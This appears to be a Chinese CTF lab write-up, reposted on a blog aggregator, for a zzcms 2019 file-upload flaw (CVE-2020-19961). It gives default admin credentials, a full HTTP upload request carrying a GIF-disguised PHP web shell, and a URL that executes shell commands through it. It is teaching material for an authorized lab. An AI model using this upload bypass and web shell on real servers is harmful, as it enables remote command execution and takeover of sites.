1. Toy模板网首页
  2. > Toy博客

[春秋云镜]CVE-2020-19960,CVE-2020-19961

7月前 作者:web-春天11 分类:Toy博客 阅读(23) 违法举报

这篇具有很好参考价值的文章主要介绍了[春秋云镜]CVE-2020-19960,CVE-2020-19961。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!

靶场介绍

zz cms 2019 存在sql注入漏洞 (CVE-2020-19960,CVE-2020-19961即可通关文件上传漏洞获取flag)

春秋云镜开启靶场:

http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/

后台

http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/admin/login.php

账号admin 密码admin

登录进来找上传点

cve-2020-19961,靶场,春秋云镜,安全,web安全

 http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/uploadimg_form.php?noshuiyin=1&imgid=2
cve-2020-19961,靶场,春秋云镜,安全,web安全
 

 cve-2020-19961,靶场,春秋云镜,安全,web安全

上传一张图片 修改后缀为.phtml

POST /uploadimg.php HTTP/1.1
Host: eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------193076518811279314343225962366
Content-Length: 664
Origin: http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/uploadimg_form.php
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669902296,1669945756,1669953976,1670045049; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1670050507; __tins__713776=%7B%22sid%22%3A%201670052271753%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201670054071753%7D; __51cke__=; __51laig__=1; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; tablename=zzcms_zsclass
Upgrade-Insecure-Requests: 1

-----------------------------193076518811279314343225962366
Content-Disposition: form-data; name="g_fu_image[]"; filename="1.phtml"
Content-Type: image/jpeg

GIF89a
<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>



-----------------------------193076518811279314343225962366
Content-Disposition: form-data; name="Submit"

提交
-----------------------------193076518811279314343225962366
Content-Disposition: form-data; name="noshuiyin"


-----------------------------193076518811279314343225962366
Content-Disposition: form-data; name="imgid"


-----------------------------193076518811279314343225962366--

cve-2020-19961,靶场,春秋云镜,安全,web安全

 cve-2020-19961,靶场,春秋云镜,安全,web安全

获取flag

http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/uploadfiles/2022-12/20221203074749583.phtml?s=cat%20../../../../../../../../flag
cve-2020-19961,靶场,春秋云镜,安全,web安全
 文章来源地址https://www.toymoban.com/news/detail-626084.html

到了这里,关于[春秋云镜]CVE-2020-19960,CVE-2020-19961的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • [春秋云镜]CVE-2021-32305

    [春秋云镜]CVE-2021-32305

    WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。 春秋云镜开启靶场: http://eci-2ze4llupfqpd6hmetmkb.cloudeci1.ichunqiu.com 验证漏洞 http://eci-2ze4llupfqpd6hmetmkb.cloudeci1.ichunqiu.com/search.php?sear

    2024年02月11日
    浏览(30)
  • 1、[春秋云镜]CVE-2022-32991

    1、[春秋云镜]CVE-2022-32991

      靶场提示:该CMS的welcome.php中存在SQL注入攻击。   NVD关于漏洞的描述:   注入点不仅在 eid 处!!! (1)既然NVD说漏洞在welcome.php处,且参数为 eid ,先注册账号。 (2)登录账号后,发现页面就是welcome.php。 (3)随便点一个 action ,点点 submit ,会发现url中的n参数

    2024年02月11日
    浏览(29)
  • 春秋云镜cve-2022-32991wp

    春秋云镜cve-2022-32991wp

    首先看靶标介绍:该CMS的welcome.php中存在SQL注入攻击 访问此场景,为登录界面,可注册,注册并登陆后找可能存在sql注入的参数,尝试在各个参数后若加一个单引号报错,加两个单引号不报错,说明此参数可能存在sql注入,经过尝试在 http://xxx.ichunqiu.com/welcome.php?q=quizstep=2ei

    2024年02月12日
    浏览(49)
  • [春秋云镜] CVE-2022-28060 详细讲解

    [春秋云镜] CVE-2022-28060 详细讲解

    目录 前期准备 工具+环境 渗透测试 靶场提示 靶场测试 burpsuite SQLmap Victor CMS v1.0 /includes/login.php 存在sql注入 1.打开开启的靶场,右边发现一个登入界面   2.任意输入账号密码,打开burpsuite进行抓包 3.将抓到的包放入一个文件,使用SQLmap去爆破 4.爆破出来之后,选择y生成文件,

    2024年02月13日
    浏览(30)
  • 春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)

    春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)

      靶标介绍: Subrion CMS 4.2.1 存在文件上传漏洞 进入题目: admin/admin    点击设置:  后台管理主页:  上传页面: 上传目录: /panel/uploads/   查看上传位置:  上传位置:  uploads/system.pht  flag{24505f02-d430-4d3b-905e-17349e09c34c}

    2024年02月11日
    浏览(25)
  • [春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

    [春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

     访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来 时间3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag  动下小手来个赞吧~~~  和上面同类型,点击首页上面banner的admin,未授权直接进入,找到如图的注入点   抓包,保存为3.txt,s

    2024年02月11日
    浏览(37)
  • 安全生产:CVE-2020-11022/CVE-2020-11023漏洞解析

    安全生产:CVE-2020-11022/CVE-2020-11023漏洞解析

    代码安全扫描阶段,前端资源审计发现 jQuery 版本过低导致生产系统存在 CVE-2020-11022/CVE-2020-11023 类风险。且影响范围: jQuery = 1.0.3 3.5.0 。 该类风险为应用安全缺陷类DXSS攻击,攻击者可以利用该漏洞注入恶意脚本代码,并在受害者的浏览器上执行。将导致受害者的个人信息泄

    2024年02月05日
    浏览(33)
  • Apache Tomcat 安全漏洞(CVE-2020-13935)复现

    Apache Tomcat 安全漏洞(CVE-2020-13935)复现

    漏洞详情: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。 影响版

    2024年02月11日
    浏览(37)
  • 漏洞修复--Haxx curl 安全漏洞 (CVE-2020-8177)

    漏洞修复--Haxx curl 安全漏洞 (CVE-2020-8177)

    Haxxcurl是瑞典Haxx公司的一套利用URL语法在命令行下工作的文件传输工具。该工具支持文件上传和下载,并包含一个用于程序开发的libcurl(客户端URL传输库)。Haxxcurl7.20.0版本至7.71.0之前版本中存在安全漏洞。攻击者可利用该漏洞覆盖本地文件。 使用阿里云或者腾讯云的仓库

    2024年02月08日
    浏览(40)
  • 【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)

    【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的

    2024年02月08日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包